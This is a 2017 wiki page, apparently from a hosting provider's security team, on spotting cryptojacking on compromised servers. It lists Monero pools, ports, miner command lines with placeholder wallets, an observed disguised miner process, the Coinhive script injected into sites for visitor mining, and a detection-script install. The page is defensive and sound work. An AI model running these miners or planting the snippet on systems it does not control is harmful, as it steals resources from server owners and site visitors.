Hestat edited this page Dec 14, 2017 · 1 revision

Malicious Crypto mining

Crypto mining on servers is seeing a rise in popularity, as of 12/13/17 Bitcoin has a value above 16,000 per coin. While still far behind phishing and spamming crypto mining on servers is becoming a rising way to monetize malicious servers. In research performed for this wiki, over 17 cases of mining on our network mined $634,000 USD in Monero coins.

Besides the rising value of coins newer currencies, at this time specifically Monero (XMR) has made this a viable strategy to extract value out of a compromised server.


Crypto mining at this time is generally performed by a pool of computers, where various 'miners' (in our case compromised servers) contribute compute resources and get paid out on what percentage of the compute power they contribute to said pool.

The following pools have been observed in malicious mining: xmr.crypto-pool.fr xmr-eu1.nanopool.org yescrypt.mine.zpool.ca pool.minexmr.com monerohash.com

These are the ports they generally communicate on: 3333, 4444, 5555, 6666, 7777, 8888, 9999, 14444, 14433

Programs Used

These are the programs used by most pools: CPUMiner (forked by LucasJones & Wolf)

Example: minerd -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

YAM Miner (by yvg1900)

Example: yam -c x -M stratum+tcp://YOUR_WALLET_ADDRESS:x@xmr.crypto-pool.fr:3333/xmr

Claymore CPU Miner

Example: NsCpuCNMiner64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

Claymore GPU Miner

Example: NsGpuCNMiner -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

`ccminer (forked by tsiv) ``

Example: ccminer -o stratum+tcp://xmr.crypto-pool.fr:3333 -u YOUR_WALLET_ADDRESS -p x

Detection Methods

Minerchk script There is an alpha version script available for detecting miners:

mkdir -p /root/bin

wget -O /root/bin/minerchk https://raw.githubusercontent.com/Hestat/minerchk/master/minerchk.sh

chmod +x /root/bin/minerchk

Most often you will come across these compromises during a load investigation, other hacked site investigation, or if you see an LFD alert like the following.

Example LFD Alert



Command Line (often faked in exploits):

-bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 46uk51aJnMT4VyvwEGhHA9QKSsFiDt8iN48nJza7xnG9epk7y9Xz6KCDfai1bLALuFa7rHNoMPep1RZw8J8GLr4q1fnLNZ4 -p x

These miners most frequently are load in a shared area such as /tmp or /dev/shm The will often leave a file behind that lives in one of these directories and ends with the .c file type: root@host [1563 18:27:40 ~]# cat /tmp/phpXBaIHk.c threads = 1

mine = stratum+tcp://4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN:x@xmr.crypto-pool.fr:3333/xmr

This will be accompanied by a file that mirrors the name of the .c file that will be the compile binary doing the mining.

Clientside Mining

Another new method of mining is to inject malicious javascript into site files causing any clients that go to the site to mine crypto in the browser.

The Coinhive pool was one of the first to create a mining pool gear exclusively towards this kind of mining. The following script is how they currently implement this miner onto a site: <script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.User('<site-key>', 'john-doe'); miner.start(); </script>

Tracking wallets

In most of the cases the mining software used will reveal the wallet used to collect the XMR payout. From the example used previously: mine = stratum+tcp://4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN:x@xmr.crypto-pool.fr:3333/xmr The public key to the wallet is : 4AQVBkuyXEaWRzmF8tBynWdMA1kAA6rzricUH7Jj5UNaYT3UXH4aT8c2TTKLw3VyZZLgt15WD7xAA1NamQ7rgzXA3pxNpxN After doing some additional searching we can see this pool is tied to here: https://monero.crypto-pool.fr

Here we can see that this miner has earn 1.50 XMR or around $450 at the current exchange rate of 299USD/XMR.

These pools will also lock accounts that have been identified for malicious mining as one wallet found in current research returned the following response.

`You addresse mining is suspend for botnet usage.Send me email to mine@crypto-pool.fr

So locating and submitting take down requests would be advantageous to lowering the incidence of mining on our network.

Clone this wiki locally
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.